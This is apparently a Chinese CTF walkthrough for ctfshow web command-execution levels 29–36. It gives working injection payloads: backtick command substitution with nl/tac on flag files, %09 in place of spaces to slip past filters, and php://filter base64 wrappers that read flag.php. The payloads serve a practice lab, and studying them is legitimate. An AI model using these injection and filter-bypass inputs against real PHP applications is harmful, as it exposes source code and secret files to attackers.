ctfshow-web入门命令执行29

29

源代码给了禁用flag

使用tac、nl

复制代码
?c=echo `nl f*`;
?c=echo `tac f*`;

30

多禁用了system和php

和上题区别不大,使用上一题命令就能解

?c=echo `nl f*`;

?c=echo `tac f*`;

31

禁用了空格使用%09代替

?c=echo%09`tac%09f*`;

32

禁用了echo

使用php伪协议

?c=include$_GET"1"?>&1=php://filter/read=convert.base64-encode/resource=flag.php

最后解一下base64就行了

33

多过滤了"

?c=include$_GET1?>&1=php://filter/read=convert.base64-encode/resource=flag.php

34-36

一样命令就可以得到flag

相关推荐
RisunJan6 小时前
Linux命令-rlogin(远程登录)
linux·运维
深圳恒讯6 小时前
菲律宾云服务器与传统VPS的架构差异
运维·服务器·架构
蓝天下的守望者6 小时前
svt_apb_if里的宏定义问题
运维·服务器·数据库
小林ixn6 小时前
从“玩具工具”到“跨语言利器”:MCP 协议实战解析
运维·服务器·网络
小顿的企业观察7 小时前
中企出海战略规划,正在从“走出去”转向“走进去”
大数据·运维·人工智能·产品运营·制造
数智化转型推荐官7 小时前
2026统一身份管理系统五大发展趋势解读
java·运维·微服务
看菜鸡互7 小时前
探索用 SlideML 让大模型生成 PPT 的实验方法
java·运维
2603_954708318 小时前
全维度容错设计,打造微电网安全运行屏障
服务器·网络·数据库·人工智能·分布式·安全
其实防守也摸鱼8 小时前
蓝队相关知识学习(1)---常用堡垒机和服务器
服务器·功能测试·学习·网络安全·网络攻击模型·攻防对抗·蓝队
大飞记Python9 小时前
Linux命令速查手册(测试开发4年实战总结,附PDF)
linux·网络·pdf